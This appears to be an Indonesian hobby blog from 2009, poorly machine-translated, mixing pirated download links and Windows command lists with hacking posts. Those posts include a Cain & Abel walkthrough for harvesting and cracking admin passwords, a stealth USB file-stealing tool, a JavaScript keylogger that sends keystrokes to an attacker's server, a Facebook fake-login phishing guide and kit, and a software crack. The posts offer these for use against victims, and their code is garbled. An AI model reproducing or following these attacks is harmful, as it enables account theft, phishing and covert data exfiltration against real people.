Sabtu, 05 Desember 2009

Counter-Strike Portable

Bookmark and Share


Counter-Strike: Source is an enhanced version of one of the most cherished of production in recent years. The game was initially only be extended modem to the first part of the famous Half-Life'a. After the huge success of this programme was decided, inter alia, on a boxed edition of Counter-Strike'a, this game doczekala are also many other versions, inter alia, for the Xbox. The product is primarily a visual changes, the game mechanics remained largely unchanged.
(LAN ONLY)

























DownLoad
Code:
http://rapidshare.com/files/314104817/Portable_Counter-Strike_SourceX_By_philly93.part1.rar
http://rapidshare.com/files/314118517/Portable_Counter-Strike_SourceX_By_philly93.part2.rar






Route.exe

Bookmark and Share

Manipulate network routing tables. Route packets of network traffic from one subnet to another by modifying the route table.
Syntax

Display route details:
ROUTE [-f] PRINT [destination_host] [MASK subnet_mask_value] [gateway]
[METRIC metric] [IF interface_no.]

Add a route:
ROUTE [-f] [-p] ADD [destination_host] [MASK subnet_mask_value] [gateway]
[METRIC metric] [IF interface_no.]

Change a route:
ROUTE [-f] CHANGE [destination_host] [MASK subnet_mask_value] [gateway]
[METRIC metric] [IF interface_no.]

Delete a route:
ROUTE [-f] DELETE [destination_host] [MASK subnet_mask_value] [gateway]
[METRIC metric] [IF interface_no.]

key
-f Clear (flush) the routing tables of all gateway entries. If this is
used in conjunction with one of the commands, the tables are
cleared prior to running the command.

destination_host
The address (or set of addresses) that you want to reach.

-p Create a persistent route - survives system reboots.
(not supported in Windows 95)

subnet_mask_value
The su

Rabu, 25 November 2009

Comic Naruto

Bookmark and Share





DownLoad

http://www.ziddu.com/download/7481813/387.zip.html
http://www.ziddu.com/download/7481861/388.zip.html
http://www.ziddu.com/download/7481862/389.zip.html
http://www.ziddu.com/download/7482453/390.zip.html
http://www.ziddu.com/download/7482801/391.zip.html
http://www.ziddu.com/download/7483257/392.zip.html
http://www.ziddu.com/download/7483330/393.zip.html
http://www.ziddu.com/download/7483465/394.zip.html
http://www.ziddu.com/download/7483584/395.zip.html
http://www.ziddu.com/download/7483585/396.zip.html



The rest will soon be updated.




Senin, 23 November 2009

PATHPING

Bookmark and Share

Trace route and provide network latency and packet loss for each router and link in the path. Combines the functionality of PING and TRACERT.
Syntax
PATHPING [-n] [-h max_hops] [-g host_list] [-p period]
[-q num_queries] [-w timeout] [-i IPAddress] [-4 ] [-6 ][TargetName]

Key
-g host_list - Loose source route along host-list.
-h max_hops - Maximum number of hops to search for target.
-i address - Use the specified source address.
-n - Do not resolve addresses to hostnames.
-p period - Wait period milliseconds between pings.
-q num_queries - Number of queries per hop.
-w timeout - Wait timeout milliseconds for each reply.
-P - Test for RSVP PATH connectivity.
-R - Test if each hop is RSVP aware.
-T - Test connectivity to each hop with Layer-2 priority tags.
-4 - Force using IPv4.
-6 - Force using IPv6.
Pathping is invaluable for determining which routers or subnets may be having network problems - it displays the degree of packet loss at any given router or link.
Pathping sends multiple Echo Request messages to each router between a source and destination over a period of time and computes aggregate results based on the packets returned from each router.
Pathping performs the equivalent of the tracert command by identifying which routers are on the path.
To avoid network congestion and to minimize the effect of burst losses, pings should be sent at a sufficiently slow pace (not too frequently.)
When -p is specified, pings are sent individually to each intermediate hop. When -w is specified, multiple pings can be sent in parallel. It's therefore possible to choose a Timeout parameter that is less than the wait Period * Number of hops.
Firewalls
Like tracert PathPing uses Internet Control Message Protocol (ICMP) over TCP/IP. Many firewalls will block ICMP traffic by default. If an attacker is able to forge ICMP redirect packets, he or she can alter the routing tables on the host and possibly subvert the security of the host by causing traffic to flow via a path you didn't intend.
"The path changes, so too must the traveler" - Tarek Verena

All Dos Commands

Bookmark and Share

ADDUSERS Add or list users to/from a CSV file

ARP Address Resolution Protocol

ASSOC Change file extension associations

ASSOCIAT One step file association

AT Schedule a command to run at a later time

ATTRIB Change file attributes



BOOTCFG Edit Windows boot settings

BROWSTAT Get domain, browser and PDC info



CACLS Change file permissions

CALL Call one batch program from another

CD Change Directory - move to a specific Folder

CHANGE Change Terminal Server Session properties

CHKDSK Check Disk - check and repair disk problems

CHKNTFS Check the NTFS file system

CHOICE Accept keyboard input to a batch file

CIPHER Encrypt or Decrypt files/folders

CleanMgr Automated cleanup of Temp files, recycle bin

CLEARMEM Clear memory leaks

CLIP Copy STDIN to the Windows clipboard.

CLS Clear the screen

CLUSTER Windows Clustering

CMD Start a new CMD shell

COLOR Change colors of the CMD window

COMP Compare the contents of two files or sets of files

COMPACT Compress files or folders on an NTFS partition

COMPRESS Compress individual files on an NTFS partition

CON2PRT Connect or disconnect a Printer

CONVERT Convert a FAT drive to NTFS.

COPY Copy one or more files to another location

CSVDE Import or Export Active Directory data



DATE Display or set the date

Dcomcnfg DCOM Configuration Utility

DEFRAG Defragment hard drive

DEL Delete one or more files

DELPROF Delete NT user profiles

DELTREE Delete a folder and all subfolders

DevCon Device Manager Command Line Utility

DIR Display a list of files and folders

DIRUSE Display disk usage

DISKCOMP Compare the contents of two floppy disks

DISKCOPY Copy the contents of one floppy disk to another

DNSSTAT DNS Statistics

DOSKEY Edit command line, recall commands, and create macros

DSADD Add user (computer, group..) to active directory

DSQUERY List items in active directory

DSMOD Modify user (computer, group..) in active directory



ECHO Display message on screen

ENDLOCAL End localisation of environment changes in a batch file

ERASE Delete one or more files

EXIT Quit the CMD shell

EXPAND Uncompress files

EXTRACT Uncompress CAB files



FC Compare two files

FDISK Disk Format and partition

FIND Search for a text string in a file

FINDSTR Search for strings in files

FOR Conditionally perform a command several times

FORFILES Batch process multiple files

FORMAT Format a disk

FREEDISK Check free disk space (in bytes)

FSUTIL File and Volume utilities

FTP File Transfer Protocol

FTYPE Display or modify file types used in file extension associations



GLOBAL Display membership of global groups

GOTO Direct a batch program to jump to a labelled line



HELP Online Help

HFNETCHK Network Security Hotfix Checker



IF Conditionally perform a command

IFMEMBER Is the current user in an NT Workgroup

IPCONFIG Configure IP



KILL Remove a program from memory



LABEL Edit a disk label

LOCAL Display membership of local groups

LOGEVENT Write text to the NT event viewer.

LOGOFF Log a user off

LOGTIME Log the date and time in a file



MAPISEND Send email from the command line

MEM Display memory usage

MD Create new folders

MODE Configure a system device

MORE Display output, one screen at a time

MOUNTVOL Manage a volume mount point

MOVE Move files from one folder to another

MOVEUSER Move a user from one domain to another

MSG Send a message

MSIEXEC Microsoft Windows Installer

MSINFO Windows NT diagnostics

MSTSC Terminal Server Connection (Remote Desktop Protocol)

MUNGE Find and Replace text within file(s)

MV Copy in-use files



NET Manage network resources

NETDOM Domain Manager

NETSH Configure network protocols

NETSVC Command-line Service Controller

NBTSTAT Display networking statistics (NetBIOS over TCP/IP)

NETSTAT Display networking statistics (TCP/IP)

NOW Display the current Date and Time

NSLOOKUP Name server lookup

NTBACKUP Backup folders to tape

NTRIGHTS Edit user account rights



PATH Display or set a search path for executable files

PATHPING Trace route plus network latency and packet loss

PAUSE Suspend processing of a batch file and display a message

PERMS Show permissions for a user

PERFMON Performance Monitor

PING Test a network connection

POPD Restore the previous value of the current directory saved by PUSHD

PORTQRY Display the status of ports and services

PRINT Print a text file

PRNCNFG Display, configure or rename a printer

PRNMNGR Add, delete, list printers set the default printer

PROMPT Change the command prompt

PsExec Execute process remotely

PsFile Show files opened remotely

PsGetSid Display the SID of a computer or a user

PsInfo List information about a system

PsKill Kill processes by name or process ID

PsList List detailed information about processes

PsLoggedOn Who's logged on (locally or via resource sharing)

PsLogList Event log records

PsPasswd Change account password

PsService View and control services

PsShutdown Shutdown or reboot a computer

PsSuspend Suspend processes

PUSHD Save and then change the current directory



QGREP Search file(s) for lines that match a given pattern.



RASDIAL Manage RAS connections

RASPHONE Manage RAS connections

RECOVER Recover a damaged file from a defective disk.

REG Read, Set or Delete registry keys and values

REGEDIT Import or export registry settings

REGSVR32 Register or unregister a DLL

REGINI Change Registry Permissions

REM Record comments (remarks) in a batch file

REN Rename a file or files.

REPLACE Replace or update one file with another

RD Delete folder(s)

RDISK Create a Recovery Disk

RMTSHARE Share a folder or a printer

ROBOCOPY Robust File and Folder Copy

ROUTE Manipulate network routing tables

RUNAS Execute a program under a different user account

RUNDLL32 Run a DLL command (add/remove print connections)



SC Service Control

SCHTASKS Create or Edit Scheduled Tasks

SCLIST Display NT Services

ScriptIt Control GUI applications

SET Display, set, or remove environment variables

SETLOCAL Begin localisation of environment changes in a batch file

SETX Set environment variables permanently

SHARE List or edit a file share or print share

SHIFT Shift the position of replaceable parameters in a batch file

SHORTCUT Create a windows shortcut (.LNK file)

SHOWGRPS List the NT Workgroups a user has joined

SHOWMBRS List the Users who are members of a Workgroup

SHUTDOWN Shutdown the computer

SLEEP Wait for x seconds

SOON Schedule a command to run in the near future

SORT Sort input

START Start a separate window to run a specified program or command

SU Switch User

SUBINACL Edit file and folder Permissions, Ownership and Domain

SUBST Associate a path with a drive letter

SYSTEMINFO List system configuration



TASKLIST List running applications and services

TIME Display or set the system time

TIMEOUT Delay processing of a batch file

TITLE Set the window title for a CMD.EXE session

TOUCH Change file timestamps

TRACERT Trace route to a remote host

TREE Graphical display of folder structure

TYPE Display the contents of a text file



USRSTAT List domain usernames and last login



VER Display version information

VERIFY Verify that files have been saved

VOL Display a disk label



WHERE Locate and display files in a directory tree

WHOAMI Output the current UserName and domain

WINDIFF Compare the contents of two files or sets of files

WINMSD Windows system diagnostics

WINMSDP Windows system diagnostics II

WMIC WMI Commands



XCACLS Change file permissions

XCOPY Copy files and folders

Senin, 13 Juli 2009

Anti Spam Scrips

Bookmark and Share

Anti Spam scripts that will protect your forms to be submited by spammer's bots. Captcha (an acronym for "Completely Automated Public Turing test to tell Computers and Humans Apart" ) is the most common and effertive spa, protction technique

Captcha is a type of challenge-response test used in computing to determine whether or not the user is human or spammer's robot. A CAPTCHA involves one computer (a server) which asks a user to complete a test. While the computer is able to generate and grade the test, it is not able to solve the test on its own. Because computers are unable to solve the CAPTCHA, any user entering a correct solution is presumed to be human.

Protect your forms from spammers with these free php spam protection scrips



I. DESCRIPTION



Image Validator is a GPL CAPTCHA php script to stop spam on any form: comment areas, sign-ups, shopping carts - any area of your website where you fear the evil spammers may target.





II. REQUIREMENTS



1. Apache 1 or 2

2. PHP 4 or 5

3. GD 2 with truetype support





III. INSTALLATION



0. Unpack this package.

1. You may edit _config.php file located in imgval directory.

2. You may copy some TrueType fonts in imgval/fonts directory.

2. Upload or copy imgval directory to browsable directory.

3. Open imgval/index.php in your browser for testing.





IV. INTEGRATION NOTES



In tag, 'src' parametter should be linked with imgval/code.php.



Example: .



To prevent cache images you may add some unique parameter.



Example: " />



Your should start a session in the response PHP file. In the valid action

PHP source code you should verify MD5 sum of the input-code-field-value

with session variable named __img_code__



Example:



if (md5($_POST['code']) == $_SESSION['__img_code__'])

echo "Valid code";

else

echo "Invalid code";

Free Arcade Script - PHP Script

Bookmark and Share

ee Arcade script for your gaming site.

Full Arcade Script Features:

Admin Panel
» Add Game (Self hosted or enabled hosted)
» Manage Games (Edit/Delete)
» Add Category
» Manage Categories (Delete/Edit)
» Add Link
» Manage Links (Delete/Edit)
» Approve Comments (Delete/Approve)
» Site Settings

Frontend Features
» Categories
» Top Users
» Links
» Statics of website
» Ajax Rating
» Game Comments
» Most Played Games
» Newest Listed Games
» Search for Games

User Accounts
» Comment on Games
» Add games to favorites
» Change password

Server Requirements
» PHP 4+
» 1 MySQL Database



Script Details
Website:Home of Free Arcade ScriptPopular
Free Demo:Demo
Free Download:Download
Average Visitor Rating:4.76 (Out of 5)
Number of ratings:8
Hits:2552
Added:2009-01-12 04:14:54
Last updated:2009-01-12 04:18:25

301 Redirect

Bookmark and Share

301 redirect is the most efficient and Search Engine Friendly method for webpage redirection. It's not that hard to implement and it should preserve your search engine rankings for that particular page. If you have to change file names or move pages around, it's the safest option. The code "301" is interpreted as "moved permanently".




Below are a Couple of methods to implement URL Redirection


IIS Redirect



  • In internet services manager, right click on the file or folder you wish to redirect

  • Select the radio titled "a redirection to a URL".

  • Enter the redirection page

  • Check "The exact url entered above" and the "A permanent redirection for this resource"

  • Click on 'Apply'


Redirect in ColdFusion


<.cfheader statuscode="301" statustext="Moved permanently">

<.cfheader name="Location" value="http://www.new-url.com">



Redirect in PHP



Header( "HTTP/1.1 301 Moved Permanently" );

Header( "Location: http://www.new-url.com" );

?>



Redirect in ASP


<%@ Language=VBScript %>

<%

Response.Status="301 Moved Permanently" Response.AddHeader "Location", " http://www.new-url.com"

>



Redirect in ASP .NET






Redirect Old domain to New domain (htaccess redirect)


Create a .htaccess file with the below code, it will ensure that all your directories and pages of your old domain will get correctly redirected to your new domain.

The .htaccess file needs to be placed in the root directory of your old website (i.e the same directory where your index file is placed)


Options +FollowSymLinks

RewriteEngine on

RewriteRule (.*) http://www.newdomain.com/$1 [R=301,L]


Please REPLACE www.newdomain.com in the above code with your actual domain name.


In addition to the redirect I would suggest that you contact every backlinking site to modify their backlink to point to your new website.


Note* This .htaccess method of redirection works ONLY on Linux servers having the Apache Mod-Rewrite moduled enabled.




Redirect to www (htaccess redirect)


Create a .htaccess file with the below code, it will ensure that all requests coming in to domain.com will get redirected to www.domain.com

The .htaccess file needs to be placed in the root directory of your old website (i.e the same directory where your index file is placed)


Options +FollowSymlinks

RewriteEngine on

rewritecond %{http_host} ^domain.com [nc]

rewriterule ^(.*)$ http://www.domain.com/$1 [r=301,nc]


Please REPLACE domain.com and www.newdomain.com with your actual domain name.


Note* This .htaccess method of redirection works ONLY on Linux servers having the Apache Mod-Rewrite moduled enabled.




How to Redirect HTML


Please refer to section titled 'How to Redirect with htaccess', if your site is hosted on a Linux Server and 'IIS Redirect', if your site is hosted on a Windows Server.


http://www.webconfs.com/

Go through a proxy server with IP Decimal

Bookmark and Share

This is a trick to cut block the site from the ISP or cafe, or your office ...
but with a different trick ...
This is Poc ...

1. Open cmd
Start>> All Programs>> Accesories>> Command Prompt

2. type ping terblock to the site we see addressnya ip ...
I cite here http://www.youtube.com
because there are some ISP that block this site ...
Code: Select all
ping www.youtube.com

then we can see the ip addressnya namely:
we get the ip addressnya:

Code: Select all
208.177.236.70
3. enter this address to

Code: Select all
http://www.allredroster.com/iptodec.htm
we have made to decimal:

we see the results ...

Code: Select all
Decimal ip address of 208.177.236.70 is HTTP: / / 3497389126

4. After the meet move HTTP: / / 3497389126 devotion to your browser!
and the results:

see you succeed

5. This is a trick you can use in addition to the 4 trick ...

6. Wait for my next post is still with the same theme but a different tricks!

7. Many roads leading to Mecca (Prayer is my pilgrimage yee .. ha ... ha ..

How to Break Proxy

Bookmark and Share

Hey bro.. you are wicked.. thanks for this info:

It's purpose if not for the bad things, speak well - both with the
possibility adminnya akan given permission to download. Actual network
admin also want all parties can download, khan cape2 so ga ga usah
nyetting2 proxy. But how ya want more, for the same ga kena angry boss,
ya forced deh be busy - busy ria ngurus proxy.

Here are caraku to go through a proxy in place kerjaku when you
want to download files from rapidshare, it is not necessarily
successful in other places, because proxy configuration is most likely
definitely different.

1. http://kharismamand iri.com/rahasia/ crackrs/01. jpg

This is the image when the site rapidshare, and, of course, have
been hit block proxy. Proxy is usually the standard by admin on the
block only to domain name only, so if accessed directly on IP, the
possibility of blocking techniques akan useless.

2. http://kharismamand iri.com/rahasia/ crackrs/02. jpg

This is the image to find IP address from rapidshare.com, usually
pke Command Prompt with the command ping is able to find its IP, can
also do with the other, an important staple in its IP.

3. http://kharismamand iri.com/rahasia/ crackrs/03. jpg

Enter the IP addresses that have been found in the browser address
bar, replacing domian name into IP addresses, such as in the picture.
If successful the site Rapidshare akan open as normal.

4. http://kharismamand iri.com/rahasia/ crackrs/04. jpg

Save Page As address, store in any location on your hard disk, and
open with any text editor, what do I prefer pke EditPlus. Search for
"Free user" and see where the direction if the site click on the Free
User button. Found in the example image address rs59.rapidshare. com

5. http://kharismamand iri.com/rahasia/ crackrs/05. jpg

Search more IP addresses from using the rs59.rapidshare. com Ping
from Command Prompt. Or the other way, the main thing should be its IP.

6. http://kharismamand iri.com/rahasia/ crackrs/06. jpg

Enter the IP addresses that have been found in the souce code to
change the domain name into an IP address, such as in the example
image. Then Save the source code.

7. http://kharismamand iri.com/rahasia/ crackrs/07. jpg

Open html source code back to using the browser. Click Users And Free.

8. http://kharismamand iri.com/rahasia/ crackrs/08. jpg

If successful it will appear to the download page for Free Users
have such a picture. Note the address bar in your browser, the open is
not a domain name, but directly to the IP address.

9. http://kharismamand iri.com/rahasia/ crackrs/09. jpg

So of course it will be back because there are words rapidshare in the address bar.

10. http://kharismamand iri.com/rahasia/ crackrs/10. jpg

Open the command prompt again, and find its IP address (again? Cape deh, this is the last suerrrrr).

11. http://kharismamand iri.com/rahasia/ crackrs/11. jpg

Enter the IP address that is found in the browser address bar to
change the IP address of a domain as in the picture. And if successful,
then we can download the file.

If you want to ribet ga pke way over utilized rapidleech.

Call again, how do the above or other illegal activities including
a violation of company rules, and of course the risk is the
responsibility of their own.

Cain & Able Tutorial

Bookmark and Share

This tutorial will cover (version 4.9.8)

INTRODUCTION

Cain is an easy application to install and configure. However, there are several powerful tools that should only be configured after you fully understand both the capabilities and consequences to the application and the target network. After all, you can’t very well hack a network if you take it down. Proceed with caution.

We need to accomplish the following steps to get the admin account:

1. Enumerate the computers on the network

2. connect to a computer and install the Abel remote app

3. Harvest user account information

4. Crack user account information passwords to get the admin account

5. Login to the target machine with the admin account

6. Install the Abel service on the target server

7. Harvest all of the hashes from a server and sent to the cracker

Once we have the admin account on the server, the rest is up to you.


First things first, after you launch the application you will need configure the Sniffer to use the appropriate network card. If you have multiple network cards, it might be useful to know what your MAC address is for your primary connection or the one that you will be using for Cain network access. You can determine your MAC address by performing the following steps:

1. Go to “Start”

2. Run

3. enter the “CMD”

4. A black window will appear

5. Enter the following information into the window without the quotes

“Ipconfig /all” and then Enter

6. Determine which one of the Ethernet adapters you are using and copy the MAC address to notepad. You use this to help determine which NIC to select in the Cain application

With the Cain application open, select the Configure menu option on the main menu bar at the top of the application. The Configuration Dialog box will appear. From the list select the device with the MAC Address of Ethernet or Wireless network card that you will be using for hacking. While we are here, let’s review some of the other tabs and information in the Configuration Dialog Box. Here is a brief description of each tab and its configuration:

Sniffer Tab: allows the user to specify the Ethernet interface and the start up options for the sniffer and ARP features of the application.

ARP Tab: Allows the user to in effect to lie to the network and tell all of the other hosts that your IP is actually that of a more important host on the network like a server or router. This feature is useful in that you can impersonate the other device and have all traffic for that device “routed” to you workstation. Keep in mind that servers and routers and designed for multiple high capacity connections. If the device that you are operating from can not keep up with traffic generated by this configuration, the target network will slow down and even come to a halt. This will surly lead to your detection and eventual demise as a hacker as the event is easily detected and tracked with the right equipment.

Filters and Ports: Most standard services on a network operate on predefined ports. These ports are defined under this tab. If you right click on one of the services you will be able to change both the TCP and UDP ports. But this will not be necessary for this tutorial, but will be useful future tutorials.

HTTP Fields: Several features of the application such as the LSA Secrets dumper, HTTP Sniffer and ARP-HTTPS will parse the sniffed or stored information from web pages viewed. Simply put, the more fields that you add to the HTTP and passwords field, the more likely you are to capture a relevant string from an HTTP or HTTPS transaction.

Traceroute: trace route or the ability to determine the path that your data will take from point A to point B. Cain adds some functionality to the GUI by allowing for hostname resolution, Net mask resolution, and Whois information gathering. This feature is key in determining the proper or available devices to spoof or siphon on your LAN or internetwork.

Console: This is the command prompt on the remote machine. Anything that you can do on your pc from the CMD prompt can be done from here. Examples include mapping a drive back to your pc and copying all the files from the target or adding local users to the local security groups or anything really. With windows, everything is possible from the command prompt.

Hashes: Allows for the enumeration of user accounts and their associated hashes with further ability to send all harvested information to the cracker.

LSA Secrets: Windows NT and Windows 2000 support cached logon accounts. The operating system default is to cache (store locally), the last 10 passwords. There are registry settings to turn this feature off or restrict the number of accounts cached. RAS DUN account names and passwords are stored in the registry. Service account passwords are stored in the registry. The password for the computers secret account used to communicate in domain access is stored in the registry. FTP passwords are stored in the registry. All these secrets are stored in the following registry key: HKEY_LOCAL_MACHINE SECURITYPolicySecrets

Routes: From this object, you can determine all of the networks that this device is aware of. This can be powerful if the device is multihommed on two different networks.

TCP Table: A simple listing of all of the processes and ports that are running and their TCP session status.

UDP Table: A simple listing of all of the processes and ports that are running and their UDP session status.

Dictionary Cracking – Select all of the hashes and select Dictionary Attack (LM). You could select the NTLM but the process is slower and with few exceptions the NTLM and NT passwords are the same and NT cracks (Guesses) faster. In the Dictionary window, you will need to populate the File window with each of you dictionary files.you have to download the tables.and copy them to cain installation directory, Check the following boxes: As is Password, Reverse, Lowercase, uppercase, and two numbers.)

Dictionary Cracking process

Click start and watch Cain work. The more lists and words that you have, the longer it will take. When Cain is finished, click exit and then look at the NT password column. All of the passwords cracked will show up next to the now owned accounts.
Take a second to look carefully at the accounts and passwords in the list. Look for patterns like the use of letters and characters in sequence. Many administrators use reoccurring patterns to help users remember their passwords. Example: Ramius password reset in November would have a user account of RAMNOV. If you can identify patterns like this you can use word generators to create all possible combinations and shorten the window.

Cryptanalysis attacking

Alright then… Resort your hashes so single out the accounts that you have left to crack. Now select all of the un-cracked or guessed accounts and right click on the accounts again and select Cryptanalysis (LM). Add the tables that you downloaded from the net to the Cain LM hashes Cryptanalysis Sorted rainbow tables window. Click start. This should go pretty quick. Take a second to review your progress and look for additional patterns.

At this point, use program like sam grab that has the ability to determine which accounts are members of the domain administrators group to see if you have gotten any admin level accounts. Once you move to the next step, which is bruting, most of what you have left are long passwords that are going to be difficult and time consuming. Any time saver applications that you can find will be helpful.

Bruting

Repeat the same process for selecting the accounts. Here is the first time that you will actually have to use your brain Bruting can be extremely time consuming. Look closely at all of the passwords that you have cracked and look for patterns. First do you see any special characters in any of the passwords cracked. How about numbers? A lot of all upper case of all lower case? Use what you see to help you determine what parameters to include when you are bruting. As you will see, the addition of a single character or symbol can take you from hours to days or even years to crack a password. The goal is to use the least amount of characters and symbols to get the account that you need. So lets finish it off. Select all of the un cracked accounts and follow the previous steps and select Brute Force (LM). The default for LM is A-Z and 0-9. This is because that is due nature of LM hashes and the way that they are stored. Another note is that sometimes you will see a “?” or several “????” and then some numbers or letters. This is also due to the nature of NT versus NTLM and the method that NT used to store passwords. If not see if you can find a repeating structure that is based on the number 7. Anyway, based on the other passwords and those accounts with an “*” in the <8>

Rampok v2.0

Bookmark and Share


Rampok_v2.0 hacking tools that are very unique. Rampok_v2.0 can steal files from the USB enter in to a PC.
How it works is very unique. Rampok_v2.0 work after the install and run. when he will run in the move all the files on the USB automatically to a folder that has been set.

And how it works is not in the know, there are not on the task manager. Unique and the victim will not do if all the files in the USB it has been in the copy by Rampok_v2.0.
Tools can stop in and easy to use. Can also select a folder as a place where you put the file of thievery.
This is one of the tools that I like. Here I will give to you is free.
Please try and feel his intensity ..

Download Free : Rampok v2.0
File Size : 786.31 KB

http://www.ziddu.com/download/5207318/Rampok_v2.0.rar.html

Make Keylogger with javascript on the website

Bookmark and Share

At this time I will discuss a bit about Javascript Keylogger.

Wow ... Moreover tuh, Google may be able to answer you questions.

Oke without many words directly aja yah ...

First, open notepad or a pet you like WordPad, Notepad ++... The point is up ...

Then paste the following code:


[+]----------------------------------------------- -------------------


var key ='';

var space = ''

function start ()

(

var xmlhttp;

if (window.XMLHttpRequest)

(

/ / Code for IE7 +, Firefox, Chrome, Opera, Safari

xmlhttp = new XMLHttpRequest ();

)

else if (window.ActiveXObject)

(

/ / Code for IE6, IE5

xmlhttp = new ActiveXObject ( "Microsoft.XMLHTTP");

)

else

(

alert ( "Browser Support XMLHTTP You Not!");

)

xmlhttp.open ( "POST", "http://yoursite/open.php", true);

xmlhttp.send (null);

)

ajaxFunction function ()

(

var xmlhttp;

if (window.XMLHttpRequest)

(

/ / Code for IE7 +, Firefox, Chrome, Opera, Safari

xmlhttp = new XMLHttpRequest ();

)

else if (window.ActiveXObject)

(

/ / Code for IE6, IE5

xmlhttp = new ActiveXObject ( "Microsoft.XMLHTTP");

)

else

(

alert ( "Your browser does not support XMLHTTP");

)

xmlhttp.open ( "POST", "http://yoursite/write.php?d =" + key, true);

xmlhttp.send (null);

)

document.write ('');


[+]----------------------------------------------- -------------------


Then save it with the name keylog.js ... Remember, JS extension. And one should not forget, "yoursite" is replaced with

URL of your own ...

Create more open.php and write.php in notepad with the following script


open.php


[+]----------------------------------------------- -------------------


$ data = $ _GET [ 'd'];

$ fp = fopen ( 'log.txt', 'a');

fwrite ($ fp, $ data);

fclose ($ fp);

?>


[+]----------------------------------------------- -------------------


salin.php


[+]----------------------------------------------- -------------------


$ data = $ _GET [ 'd'];

$ fp = fopen ( 'log.txt', 'a');

fwrite ($ fp, $ data);

fclose ($ fp);

?>


[+]----------------------------------------------- -------------------


And now you have three files namely keylog.js, open.php, write.php ...

Because I try in localhost then I'll try to make a simple HTML script

that will be used as my own website.


[+]----------------------------------------------- -------------------


Type What You Like That




[+]----------------------------------------------- -------------------


And store with the name zhecou.html

Well if you want to put it in your website then you simply add


[+]----------------------------------------------- -------------------



[+]----------------------------------------------- -------------------


Ngerti? Now place the four files zhecou.html, keylog.js, open.php and start.php

in the same directory. Well I in my directory C: mysite

because I use WAMP server

Now therefore, I will change the URL in the keylog.js be


[+]----------------------------------------------- -------------------


http://localhost/mysite


[+]----------------------------------------------- -------------------


Practice


So when you open a browser and direct you to http://localhost/mysite/zhecou.html

Well here you can type are

I will type "Many Thanks Dah guzzle You To See The Article Here"


So you will see the emergence hasil.txt that contain those words

Okay here until the first well, this article may be less useful but ... Only that

I can give ...

Now that you have to do is find the target and attach to keylog

I really comparable with the r57, C99, C100, dkk but definitely happy to be developed if ..




Hacking Facebook (Taking other people Acount)

Bookmark and Share

Who does not know that Facebook is all in the era of the internet this? Yap, Facebook is a social site, such as a laptop also ... (Males ngomong nih, a leader ma aja yah google ..)
Yes I, my previous post about how to log on false friends, this time I post about how to create a false log on facebook.

Yuuk directly to the discussion ...


1. Please list in http://www.700megs.com
why do I send you the list there?
in the web hosting is free and there is also support from the php in ripway.com
if not registered simply log in at:
http://www.700megs.com/register.jsp

2. after you successfully register the incoming 700megs.com FILE MANAGER to delete the file index.html .... (there will be later in the Cpanel masing2)

3. OK, we start our practice.
needed is the file index.php and write.php as the core fakelogin
scriptnya please download here or in the first
http://www.ziddu.com/download/5023245/scriptFakeloginFacebook.rar.html
file size 9kb.

4. after you download. There are two files called only index and write
both you please upload the 700megs.com before you have a list.

5. ago index.php first test I've uploaded and you log in from there,
I was successful .. there will be a new file; Password.txt [aim as the place
where the UserID and password that will tertampung on facebook you fakelogin]

6, alright! finished up here. . .

for distribution please masing2 way ...

cm here I love to sample one taking by force account2 facebook mania ..
open the file in the index www.700megs.com URL you .. take it .. [important]

hold for firefox users: open tools> options> main

preview


here we refer in order to function within the browser first opened the file directly led to us earlier. ravin allows you more later.
may be in the computer what to sebar / cafe in devotion.

or ..

can also spread this way



you create a new account, in yahoo, gmail, like ato

with nick @ Facebook or something like that.

cm above example ... please make your own art
enjoy ..

easy?

hopefully successfully. . .

Table rows

Bookmark and Share

A common function on many php (or other data driven) sites is to loop through an array and write the contents of the array to the page. It is preferable to spread your data over multiple columns instead of writing it all in a straight list thus forcing your readers to scroll forever. Here is an easy way to dynamically write your cells and rows using expressions.

























  1. $names=explode(",","Joe,Lisa,Bill,Roger,Fred,Kenney");






  2. $counter=-1;






  3. while (list(,$value)=each ($names))






  4. { $counter=$counter+1;






  5. ";





  6. //this is the key - if field has no remainder then field is in second column






  7. $newrow=($counter % 3);






  8. //echo $newrow;






  9. if ($newrow == 2) echo "
  10. " ;





  11. } // end of while






  12. //****This will write the data in three cells per row. To only do two cells






  13. //** per row change the 3 in the $newrow definition to a 2 and the






  14. //** comparison to a 1.






  15. ?>






  16. " . $names[$counter] . "&nbsp
    &nbsp

Create fake login with Phiser Maker

Bookmark and Share



Are you interested to make the page a fake site (phishing).
What is phishing?
Users for the virtual world is certainly not foreign to the word phishing ..
word meaning is a word of English, which means fishing. In a world of well-connected electronically at this time, many phishing term defined as a way to provoke someone to a particular page.


phishing is not infrequently used by the perpetrators of criminal on the internet in order to provoke someone to the web address through e-mail, one aim is to break down a very private information from the recipient, such as passwords, credit cards, etc. .

Among the information submitted as if the recipient's e-mail message to get out of a site, and invites to come to a false site. Site created false appearance in such a way that is similar to the original site. ago when the victim to fill in the password at the time that the Criminals know the password of the victim. Use of this site is also called the false with the term pharming.

I will provide tools for creating these false pages. You can practice for all pages

Download:

http://www.ziddu.com/download/5581398/Phisher_maker_3.1.rar.html

Hide Your IP Address v.1.0

Bookmark and Share

Hide Your IP Address purpose is to guard your privacy in Internet by changing your Internet IP Address. Start to surf anonymously. You can immediately take advantage of this handy and award winning software. The software will protect your Identity and Stop Hackers. Here is a short feature-list of this award winning software that gives you your privacy back!

- Protect and hide your Identity through hiding your IP address
- Prevent hackers from breaking into your computer
- Allows you to enter pages which are forbidden for you
- Changes your IP address (and your location)
- Delete information about ALL your internet activity
- Add your own Proxies and use your favorites

TO APPLY PATCH:
Paste the Patch into the installation directory, eg - C:\Programs and Files\Hide Your IP Address.
Open the Patch, make sure 'Make Backup' is ticked and click Patch.
You can now delete the Patch from the installation directory.
Open up Hide Your IP Address and a box will come up, click Register.
Type in anything you want for Name, E-Mail and Serial Key
Click Register then OK.
Restart Hide Your IP Address and you'll see its activated!


code:
http://rapidshare.com/files/166254810/hideyouripaddressv10.rar

or mirror :
http://depositfiles.com/files/7tkqqnhnz

Kamis, 12 Februari 2009

About me

Bookmark and Share

Nama ku Tyo.
Perhatikan baik-baik yang ku tulis karna ku pilih kata- kataku dengan hati-hati, dan aku tak akan pernah menjelaskannya lagi.
Sudah kuberi tahu namaku, itu jawaban dari "SIAPA". Jawaban "DI MANA" bisa di gambarkan sebagai sudut kamar . Tapi ada perbedaan besar antara terkurung du sudut dan terkurung di kamar, dan aku tak perlu menjelaskan apa perbedaanya.
